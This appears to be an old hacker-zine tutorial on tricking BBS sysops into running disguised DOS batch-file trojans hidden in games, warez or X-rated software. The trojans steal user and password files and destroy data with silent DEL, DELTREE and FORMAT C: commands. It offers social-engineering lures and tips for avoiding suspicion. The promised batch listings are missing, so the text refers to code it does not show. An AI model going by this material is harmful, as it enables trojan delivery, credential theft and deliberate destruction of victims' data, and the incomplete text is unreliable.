Hacking a BBS with DOS
by Section8
This article is not about dialing up your local BBS and entering a magical code that drops you to DOS. It doesn't have anything to do with modem settings, secret passwords, or built-in back doors. The problem with all of these methods of hacking is that once they are discovered, they are usually pretty easy to protect against.
To start things off, you need to find a BBS to practice on before you move on to the big dogs. I like to prey on newly started boards, or boards run by confirmed idiots. I like the idiot boards because they almost always install all the software using the default directories, or they'll at least use directory structures that are easy to guess.
Once you have found the particular board that you're going to hack, get yourself a copy of the same BBS software that your victim is using. You can usually find this on the same board for download, or on another local board. You can also find just about any BBS software around on the Internet.
Install the software on your own computer, using all the defaults for directory and file structure. Write down the directory structure, including the sub-directories that hold all the downloads, message base data, and the user info. You'll also need to find out which file(s) hold the listing for users and passwords.
Now you need to find a copy of some software that your victim will run on his computer. The type of software won't matter as long as it's something your victim will want to try out. Some examples are cool online games, BBS utilities and add-ons, regular games, demo games, shareware, etc. You could also let the guy think he's a really cool pirate and let him snag some boss 0-day warez or registered copies of cool software. For a surefire hook-in-mouth reaction, my personal favorite is X-rated software with catchy titles. I have never failed to get results this way, no matter how prudish the victims seem. I guess America is more perverted than I thought.
Once you have selected the perfect software, you'll need to make a few minor modifications before you let the sysop have it. The modifications you make will depend on your method of delivery, or how you give the shit to the victim. The preferred method is to personally give him the installation disks. That way he'll have to give you the disks back when he is done. Other ways are usually done by uploading the game to his BBS or by putting it up on another board that he frequents and having him accidentally stumble across it. We'll cover each approach separately in a moment, but first I need to discuss some often over-looked but highly powerful batch file commands.
That's right, we're going to be writing batch files that will help us abuse the victim's bulletin board, pillage files and information, and leave his lame BBS in a pile of burning ruin. Take a look at the lines below and their functions.
This will be the first line of your batch file. It helps to keep your victim from seeing what's happening as the file is running.
This line checks to see if the specified directory and file exist. If they do, the program jumps forward to a subroutine entitled :HELL. If not, then it executes the next line in the program.
The DEL C:\WINDOWS\*.* will delete all the files in the WINDOWS directory.
The only problem is that DEL *.* asks the user for a Y/N response (Are you sure you want to delete this shit?). But the ECHO Y | gives the Y response for us and proceeds without ever asking our victim if he agrees with our decision. The > NUL sends all the output from the file to a trash dumpster called NUL, rather than printing it to the screen. This way the user sees only the words we want him to see.
Normally, DELTREE requires a Y/N response to proceed. But unlike the DEL command, the ECHO Y | thing doesn't work.
So what we do is tack the /Y thing on the end which disables user prompting for the DELTREE command. Now we delete his entire GAMES directory and all the subdirectories. Again, the > NUL keeps any of this information from being displayed on the screen.
This writes the contents of the PASSWORD.LST file to drive A: and calls it FILE001.DAT to keep it from drawing much attention. People don't pay much attention to .DAT files. You could also use COPY in this particular instance.
This formats the asshole's hard drive without him having a clue that it's happening.
I haven't actually tried this because I just thought of it but I'm pretty sure it will work. It formats the C: drive as before, but the /Q /U parameters should make it a quick unconditional format, and no unformat information is kept. I know this works on floppies, but I haven't tried it on a hard drive yet. Let me know if it works.
This copies a listing of the directory structure of the hard drive to the disk in A: and calls it FILE001.DAT. This can be very useful information for future hacking excursions on the guy's computer.
This searches for a file named ASSHOLE.TXT. When it finds the file, it records the location of the file on drive A:. If you are looking for the password file but don't know which directory the guy has it in, this is a good way of finding out where it is.
This just defines a subroutine called HELL.
These are just a few powerful commands, and you'll soon see how they can bring a bulletin board to its knees. For the examples to follow, we'll assume that the BBS in question possesses the following traits:
- The main BBS directory is C:\BBS
- Files available for download are located at C:\BBS\DLOADS
- There is a file available for download called USURPER.ZIP
- Usernames and passwords are kept in C:\BBS\DATA\USERS.DAT
- The BBS is very lame.
- The program we are going to give to the sysop is the game Doom.
Chances are that you don't have the original disks so we'll say they are copies or ZIP files that you will upload. Also, everyone has had Doom for years now, so you will need to use something newer that people aren't as familiar with and something that the victim doesn't have yet. I'm just using it for an example.
Our first scenario is the most desirable. You are friends with the sysop or you at least know him and will be able to physically hand him the disks or have a mutual friend give him the disks.
On the first Doom disk, rename the INSTALL.EXE program to FILE001.DAT so it will look as if it belongs there. Then, create a file named INSTALL.BAT.
When the batch file is run on the victim's computer, it should first grab a copy of the file that contains the user and password listings, if you know where it is located. You then want to get a copy of his directory structure and then finally rename a couple of files and run Doom. It is very important to actually run the software, whatever it is, to keep your mark from becoming suspicious.
Here is an example of a file that would accomplish this:
This files grabs all the info we need, renames INSTALL.EXE, and runs install. Remember that install had been changed to FILE001.DAT so we are just changing it back. Now use BAT2EXEC to compile this batch file to .COM format to make everything look authentic. BAT2EXEC can usually be downloaded from a zillion places via the Internet Look for a good DOS utilities site.
Now all you need to do is get the disks back. You should see your files on the disk now: FILE002.DAT and FILE003.DAT which are the USERS.DAT and tree files, and FILE004.DAT which shows where the USERS.DAT file is. Copy the USERS.DAT file into your own BBS directory and you're ready to go. Now you should be able to get all the user login names and passwords. I'm confident that you'll know what to do with this information. Also, sysops and co-sysops usually have an extra password which is used for functions such as "Drop To DOS." You should also make sure to get these passwords.
If for some reason you don't have FILE002.DAT, then you listed the wrong directory and/or filename for the USER.DAT file. Look at FILE003.DAT and FILE004.DAT and see where you went wrong.
For our next scenario, we'll be uploading the software to his BBS. Things are basically the same, but now we have to make a few additions to our batch file.
We can't copy anything to the A: drive now, so we're going to use a file on his computer as a substitute for a floppy disk. We'll make it a file that is available for download so we can retrieve it at our convenience. Also, if you're not sure what the directory structure is or where the files are located, you can use IF EXIST along with some subroutines to better your odds. Try substituting different names for the directories and files. As long as you have the directory where the downloads are, you can just get the tree info and DIR /S and come back for the other shit later when you know where it's at.
Here's a sample file:
The file turns echoing off, then checks to see if the C:\BBS\DLOADS directory exists. You can't just check for the directory, so you use *.* to see if there are any files there. If they are then you know the directory exists. If it does exist then the program jumps to the :HELL subroutine. If not, the program renames the install file, runs it and ends. You can add a few more levels into the program to check for other suspected directories if you wish.
If the DLOADS directory does exist, the program creates a textfile A.TXT which contains the location of USERS.DAT and B.TXT which contains the directory tree. Then it combines these two files together with USERS.DAT and copies them over to the DLOADS directory, replacing USURPER.ZIP and then proceeds to rename and run the install program.
Some of this may seem redundant, like why would you need to know where USERS.DAT is if you already copied the file. Well you really don't, but suppose after everything is done you don't have the USERS.DAT file because it wasn't where you thought it was, or it was renamed. Now you'll be able to tell exactly where it is if it exists, and if it doesn't exist then you'll at least know some good places to look for it, even if it has been renamed.
Either way, after all this happens, all you need to do is call up the board and download the USURPER.ZIP file and it will contain the three files. Cut out the DIR /S part and the TREE info and you are left with USERS.DAT. Rename the file as USERS.DAT and copy it into your BBS directory in the appropriate place. Now you'll have everyone's username and password.
The last scenario I'll cover deals with stealth uploading. This is for when you want the guy to download your altered program without tracing it back to you or suspecting any foul play. You do the same thing with the file as before, but instead of uploading it to his BBS, you put it in your own BBS as available for download, or upload it to another BBS that he frequents. You might even leave a message about the file in the message bases so he'll be sure to find it.
If he uses the Internet, and you know where to find his Internet software, you can also get a copy of the files that show the spots on the Internet that he frequents. Like if he uses Netscape, which most people do, you can grab a listing of his sites and maybe upload more killer files to his favorite Internet set.
As far as destruction, I'll leave that up to you. I showed you earlier how to use the DEL *.*, DELTREE, and FORMAT commands to destroy things. I don't do much destruction unless the guy's a narc or a real asshole, but when I do, there are several ways I go about it.
1.) Only delete certain key files that he won't notice for a while. These files could be UNDELETE, UNFORMAT, some Windows drivers, drivers and data files for particular applications, anti-virus software, etc., etc. I also like to add virii when I do this.
2.) Delete entire trees of things. My favorite is to DELTREE the games directory. Almost everyone has a C:\GAMES directory and it seems like the only reason most shits even buy a computer is to play games, so hit 'em where it hurts. Worst case scenario is that they spend hours reloading the games, begging friends to re-borrow the pirated games, and all their save-games are lost so now they have to start all over again.
3.) Format the entire f*cking hard drive. Check for other hard drives on the system and format them too. I like to add little ANSI or graphics that say reassuring shit like "Loading... Please Wait..." or "Please be patient, this will take a few minutes..." and after the format is complete you can opt to show the guy an ANSI of a severed dick and balls along with a little message to the tune of "Not only are you a lame asshole, but now you're fucked as well!!!"
4.) Load new copies of the CONFIG.SYS and AUTOEXEC.BAT for him so nothing will work right and all his memory gets sucked down the drain. If the guy doesn't know shit about computers, he'll be screwed until one of his cheesy butt-buddies helps him set things up again.
Just a few suggestions, but I'm sure you'll do fine by yourself. Don't forget to change your batch files to .COM files with BAT2EXEC.
Also, I'm not sure how to do this with a batch file, but it would be nice to do something like a DIR /S to find the directory where a certain file is located, and then go to that directory and copy the file in question to the A: drive or wherever you want it to go. If you know a way to do this in a batch file, let me know.
Some other ideas are to use choice and some menu commands to recreate a front-end for the install program. The front-end asks the user to enter the directories he uses for his BBS as well as the name and location of his user data file and password list. Then it uses this info for everything and does it automatically. A bit more difficult to do, but much more effective. This should only be used with BBS applications to avoid raising suspicion.